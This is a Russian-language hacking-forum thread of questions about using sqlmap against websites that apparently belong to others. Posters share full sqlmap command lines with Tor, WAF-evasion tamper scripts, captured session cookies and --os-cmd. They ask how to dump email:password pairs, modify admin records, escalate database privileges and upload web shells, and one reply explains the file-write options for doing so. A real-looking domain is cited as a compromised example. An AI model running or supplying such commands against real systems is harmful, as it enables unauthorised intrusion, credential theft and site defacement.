Вопросы по SQLMap

А как добавить страницу на сайт с помощью SQL injection? Видел как хакеры hentaic0de team добавили страницу anon.php. На том сайте была скюля вида ?id=222.

 

Покажи о чём ты ?

 

Шелл залили? Это не скуля такого вида, это уязвимый параметр

 

http://bamboo.ispicio.com/about.action про эт наверное идёт речь

 

Не совсем. Там root прав нет. Права только на чтение.

 

Да! Только это сделал другой: anon99husein

 

[14:42:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 41 times

ASP.NET RequestValidationMode
какой темпер юзать?

 

Четверг, с помидорами творог.
Какой зонт брать?

 

Извините если не в том разделе,
возникла проблема с Microsoft SQL Server/Sybase stacked queries (comment)
Дело в том, что я с помощью sqlmap вытаскиваю список баз, таблицы, текущий пользователь, но никак не получается вытащить колонки и инфу из таблиц.
На каждую таблицу sqlmap предлагает брутить колонки, а на инфу говорит что таблица содержит 0 строк (Колонки указывал вручную. т.к. знаю что в некоторых таблицах есть такая)
Направьте на путь истинный, подскажите методы решения.

Запрос sqlmap -r "file.txt" --random-agent --tor --time-sec=50 --dbms=MsSQL

 

Вопрос.Есть скуля как через sqlmap изменить к примеру в таблице user где стоит первый admin изменить на имя к примеру test.

 

Исследую сайтик с уязвимостью, но юзер базы не dba, а как поднять права, чтобы можно было загрузить шел, слить файлы с сервака ? Нужно os-shell или метасплойт сессию открывать и прописывать права юзеру базы через консоль винды ( сервер на вин2003 компе).

 

Еще заметил sqlmap иногда неверно определяет имена баз, вот такое мне выдал mas\x81er имя базы, как я понял ошибся в символе, нужно его повторно запросить сделать, но вот как сделать, чтобы он начал заново, не удаляя файлик базы слитой ?

 

--fresh-queries

 

Доброго денечка всем.
Кручу один сайтец уже хз сколько времени, это пздц какой-то. В общем Бурп нашел такой алярм :

Spoiler

POST /signin.html HTTP/1.1
Host: site
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://site.com/signin.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Cookie: LiveWSNET66797313=1503752825401440622504; NNET66797313fistvisitetime=1503752825413; PHPSESSID=4702098cba379ae416288b50eeafccdb; LiveWSNET66797313sessionid=1503929382945682447623; NNET66797313visitecounts=2; _ga=GA1.2.632765216.1503752824; _gid=GA1.2.1567938367.1503934215; NNET66797313lastinvite=1503938212470; _uetsid=_uet05999b35; NNET66797313LR_cookie_t0=1; NNET66797313lastvisitetime=1503940317871; NNET66797313visitepages=18

referer=http%3a%2f%2fwww.site.com%2fsitemap.html&memberName=&memberPassWord=

Правильно ли я прописываюсь в sqlmap?

Spoiler

-u "http://site.com/signin.html" -v 3 --tamper="between,randomcase,space2comment" --random-agent --no-cast --time-sec=10 --cookie="LiveWSNET66797313=1503752825401440622504; NNET66797313fistvisitetime=1503752825413; PHPSESSID=4702098cba379ae416288b50eeafccdb; LiveWSNET66797313sessionid=1503929382945682447623; NNET66797313visitecounts=2; _ga=GA1.2.632765216.1503752824; _gid=GA1.2.1567938367.1503934215; NNET66797313lastinvite=1503938212470; _uetsid=_uet05999b35; NNET66797313LR_cookie_t0=1; NNET66797313lastvisitetime=1503940317871; NNET66797313visitepages=18" --data "referer=http%3a%2f%2fwww.site.com%2fsitemap.html&memberName=&memberPassWord="

Ребят как раскрутить? Также срабатывает WAF...

 

С этой опцией он начинает обновлять все записи. Как конкретную запись заставить его проверить на ошибки ?

 

Ребят, помогите, скулю нашел, имя БД выводит, но не могу получить Имена таблиц, соответственно и колонок, дабы дампнуть емейл:пасс
Скрин



Что пишу в Мапе:

Spoiler

-u "http://www.site:80/news/news.html?date=2016-09" --level=3 --risk=3 --random-agent --tor -D (DBS) --tables --no-cast -v 3 --identify-waf --tamper="between,randomcase,space2comment" --threads=10

 

Скорей всего блокируется Select хз меня такая же проблема была,не нашел какой темпер юзать,если кто поможет буду благодарен

 

Пытаюсь залить шелл. ls-dbs:true
Вот запрос - sqlmap -u "http://xxxxxx.com/product/shopview.php?shop=51479" --dbms=mysql --timeout=10 --time-sec=10 --random-agent --os-cmd -v 1

путь есть, указываю -
please provide a comma separate list of absolute directory paths: /home/xxxx/public_html/images/main

но он обращается сюда и подставляет из запроса product/shopview.php/ -
[WARNING] unable to upload the file stager on '/home/xxxx/public_html/images/main/product/shopview.php/'

как избавиться от этого? Ведь указываю путь куда именно залить файл

 

Code:

    --file-write=WFILE  Write a local file on the back-end DBMS file system  --- локальный путь до файла
    --file-dest=DFILE   Back-end DBMS absolute filepath to write to  --- куда лить на удаленном хосте

а вообще чего руками то не залить

 

точно

Спасибо за развернутый ответ. Изучал мануал. Вы наверное родились с этими знаниями. Горжусь вами. Просто задал вопрос